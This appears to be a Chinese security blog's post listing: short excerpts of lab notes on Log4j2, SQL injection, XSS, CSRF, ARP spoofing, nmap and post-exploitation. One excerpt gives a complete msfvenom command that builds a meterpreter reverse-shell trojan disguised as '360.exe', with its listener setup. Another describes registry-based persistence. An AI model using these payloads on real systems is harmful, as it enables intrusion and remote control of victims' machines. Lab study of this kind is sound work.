人已走-优快云博客

原创 Apache Log4j2 远程代码执行漏洞复现

靶场：Vulfocus 靶场环境目前 Vulfocus 已经集成 Log4j2 环境，可通过以下链接启动环境测试：http://vulfocus.fofa.so/#/dashboard?image_id=3b8f15eb-7bd9-49b2-a69e-541f89c4216c也可通过 docker pull vulfocus/log4j2-rce-2021-12-09:latest 拉取本地环境运行。漏洞复现：我是本地复现：环境:*服务器地址：kali ip（192.168.30.1

2022-03-06 19:15:13 5127 1

原创应急响应流程以及入侵排查

归纳转载于：应急响应的整体思路和基本流程 - FreeBuf网络安全行业门户不管是普通的企业，还是专业的安全厂商，都不可避免的需要掌握和运用好信息安全的知识、技能，以便在需要的时候，能够御敌千里。https://www.freebuf.com/articles/endpoint/192859.html应急响应之windows入侵排查篇 - FreeBuf网络安全行业门户本文主要讨论windows被入侵后的排查思路。https://www.freebuf.com/articles/network/28

2022-01-14 16:08:03 6083

转载 cs流量特征隐藏

转载mark一下https://xz.aliyun.com/t/9542https://xz.aliyun.com/t/9542

2021-11-16 14:35:55 1695

原创 WebGoat之JWT部分攻略

环境搭建使用docker容器搭建webgoat环境什么是JWTJson web token (JWT), 是为了在网络应用环境间传递声明而执行的一种基于JSON的开放标准.该token被设计为紧凑且安全的，特别适用于分布式站点的单点登录（单点登录SSO：在多个应用系统中，只需要登录一次，就可以访问其他相互信任的应用系统。）场景。JWT的声明一般被用来在身份提供者和服务提供者间传递被认证的用户身份信息，以便于从资源服务器获取资源，也可以增加一些额外的其它业务逻辑所必须的声明信息，该token也可直

2021-10-11 14:47:47 4236

原创 sqlmap的基本命令

常见存在注入的点cookie get的参数 post参数（通常是在包的下面）sqlmap参数-u 检测url地址，浅绿色标注--dbs 所有数据库--current-db 当前应用使用的数据库名是什么-D 数据库名 --tables 查看所有表-T users 看users表--columns列出表中所有字段和数据的类型-C user,pass 读字段--dump 取值列出-m 取列表里的值挨个去攻击把带有参数的都放一起，批量跑-r

2021-06-24 20:43:44 750

原创皮卡丘--sql注入

概述：在owasp发布的top10排行榜里，注入漏洞一直是危害排名第一的漏洞，其中注入漏洞里面首当其冲的就是数据库注入漏洞。一个严重的SQL注入漏洞，可能会直接导致一家公司破产！SQL注入漏洞主要形成的原因是在数据交互中，前端的数据传入到后台处理时，没有做严格的判断，导致其传入的“数据”拼接到SQL语句中后，被当作SQL语句的一部分执行。从而导致数据库受损（被脱裤、被删除、甚至整个服务器权限沦陷）。在构建代码时，一般会从如下几个方面的策略来防止SQL注入漏洞：1.对传进SQL语句里面的

2021-06-21 21:39:14 657

原创数据库简单命令回顾

在没有配置mysql环境变量的情况下，使用phpstudy的mysql进行演示访问C:\phpstudy_pro\Extensions\MySQL5.7.26\bin>输入mysql -u root -p使用root账户登录数据库show databases; 所有的sql语句记得加分号查看数据库中所有库的名字和数量use pkq use +数据库名字改变当前使用数据库show tables;查看当前数据库中所有的表sel...

2021-06-21 21:36:22 97

原创皮卡丘--CSRF

csrf--getget型通过url地址传参，只需要设置好url地址的参数，这时，受害者如果在登录账号的情况下，被诱导点击这个链接，那么受害者的信息就被更改为url地址中的信息了csrf--postpost型通过提交post表单进行修改操作，这时我们需要仿造一个post表单。通过查看前端代码，模防出一个form表单还是不难的。<html> <head> <meta charset="UTF-8"> </head&gt..

2021-06-21 21:34:45 424 1

原创皮卡丘--xss

xss过滤xss绕过过滤可以尝试大小写，复写绕过过滤考虑符号有无过滤htmlspecialchars方法转义定义和用法该方法会把预定义的字符转换为HTML 实体。预定义的字符是:字符替换后& (& 符号) &amp" (双引号) &quot 除非设置了 ENT_NOQUOTES' (单引号) &apos< (小于) <> (大于) >htmlspecialchars默认不对'处理

2021-06-21 21:32:26 231

原创皮卡丘--反射型xss

是否带单引号要看源代码是不是接收字符型的数据抓包可以看是以什么方式提交信息如果输入长度限制，可以使用短链接网上也有各种转链接的平台可以使用多种事件，要考虑其他关键字、事件被过滤的条件...

2021-06-21 21:31:43 190

原创 DOM型XSS

DOM型特征：整个过程都是在前端完成的，没有后端的参与（纯前端的操作！）一次弹框，在div中弹框。二次弹窗，框中">用作封闭前面的input框

2021-06-18 20:38:39 165

原创 pikachu 靶场--token防爆破

通过测试（抓包），发现token会变，所以不能用以前简单的爆破去跑字典了，会提示错误的token所以需要在第n次爆破的时候，使用第n-1次返回包中携带的token，才能通过验证（至于游客身份登录的token哪里来，其实在你第一次点开链接的时候，服务器给你的返回包里就已经有一个token了）开始爆破已知用户名是admin先随便输一下抓个包发到repeater，go一下，获得本次返回包中携带的token再转发到inturder标记下需要跑的参数，使用鱼叉模...

2021-06-18 11:17:25 1106

原创 windows基础命令操作

windo重点监控windows 安装目录system32 配置文件 config--sam 放置着用户密码，可以导出后清楚或破解（账号登录时是不能打开的） drivers--hosts 绕过cdn时有用，绕waf服务：services.msc注册表：regedit存储系统中应用的一些设置信息color -h改cmd颜色ipconfig /allipconfig /release 释放ipipconfig /r...

2021-06-17 21:32:07 186

原创 shellcode持久化--后渗透

migrate 隐藏（依附）进程键盘监控杀进程用户哈希持久化进程通过写入注册表每50秒重连主机的ip一次，走4343端口重启之后自动链接上了查看winxp启动项：开始---运行--输入msconfig -6看看靶机，顺着启动项看了一下就是右上角这个.vbs文件...

2021-06-16 22:13:17 374

原创介绍一下kali中的小工具

theHarvester -d bilibili.com -l 50 -b baidu 找到的邮箱可以用做钓鱼 h要大写 -d 搜索的域名 -l 前多少个（数量） -b 搜索引擎 baidu，bing，yahoo，google

2021-06-16 21:31:02 397

原创使用kali进行ARP攻击

攻击：想要知道攻击的原理就要先搞清楚arp的工作原理。在两台主机通信时，a主机会先从自己的arp缓存表里查找有没有b主机（目标主机）的联系方式，如果有，那就直接封装数据包，直接发送，没有的话，a主机会像全网络广播一个包，询问b主机的mac地址是什么，此时局域网内所有主机都会听到这个包，但是b主机会单独回应，这时，a主机就得到了自己想要的东西，同时会更新自己的arp缓存表。arp协议有个问题，就是这个协议完全时建立在互相信任的基础上的，所以不管是不是合法的应答，只要收到目标mac地址的广播，就会接受并...

2021-06-16 21:08:31 1565

原创简单的shellcode制作

一串机器能执行的代码 msfvenom msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.183.202 LPORT=4343 -f exe > 360.exe 生成一个名字叫360.exe的木马此时还需要一个监听端--msf中的监听模块 use exploit/multi/handler设置好lhost和lpost，记得设置payload，开启监听运行木马就能建立session，直接就进去了linux ..

2021-06-16 09:26:27 323

原创 kali的vmtools安装

vmtools的安装复制到pmt目录下解压 tar -xzvf vmwaretools-...... cd vmwaretools-distrib ./vmware-install.pl 回车...... enjoy

2021-06-15 21:29:45 344

原创 linux部分基础知识

linux特性：是一个基于POSIX和Unix的多用户，多任务，支持多线程和多CPU的操作系统基本思想Linux的基本思想有两点：第一，一切都是文件；第二，每个文件都有确定的用途。其中第一条详细来讲就是系统中的所有都归结为一个文件，包括命令、硬件和软件设备、操作系统、进程等等对于操作系统内核而言，都被视为拥有各自特性或类型的文件。至于说Linux是基于Unix的，很大程度上也是因为这两者的基本思想十分相近。完全免费Linux是一款免费的操作系统，用户可以通过网络或其他途径免费获得，并可以任意

2021-06-15 21:26:43 175 1

原创 nmap基础命令

基础命令详细命令详细分类命令主机发现-iL "文档地址" 默认扫描溯源常用windows命令 netstat -ano established：表示正在进行数据交互 -iR 5 -p 3306 随机扫描两个IP，扫描其3306端口 -open 扫描开启着的主机？ --exclude 在内网中排除部分地址段 --excludefile 通过文件在内网中排除部分地址段 -sL 将扫描过的地址打印出来 -sn 不探测端口，只探测主机是否存活nmap.

2021-06-15 21:16:51 352

原创 WebAliveScan-master 的安装

在百度中搜索WebAliveScan，找到gihub下载阅读readme.py，看到其中有下载的语句直接运行，发现报错看红字之前的报错内容以及运行程序发现是gevent这个模块安装错误重新下载这个模块安装之后就可正常运行了...

2021-06-15 21:11:23 489 2

原创 oneforall安装使用

如遇到：安装出错 0x80070643https://www.cnblogs.com/emanlee/p/11422646.html

2021-06-15 21:09:34 8217 5

原创域传送漏洞及其检测

DNS: Domain Name System一个保存IP地址和域名相互映射关系的分布式数据库,重要的互联网基础设施,默认使用的TCP/UDP端口号是53常见DNS记录类型:1AP地址记录,记录一个域名对应的IP地址2AAAA IPV6地址记录,记录一个域名对应的IPv6地址8 CNAME 别名记录,记录一个主机的别名4MX电子邮件交换记录,记录一个邮件域名对应的IP地址,如root@xxxx.com5 NS域名服务器记录,记录该域名由哪台域名服务器解析6 PTR反向记录,也即从IP地址到域名的一条

2021-06-15 21:05:18 747

renyizou的博客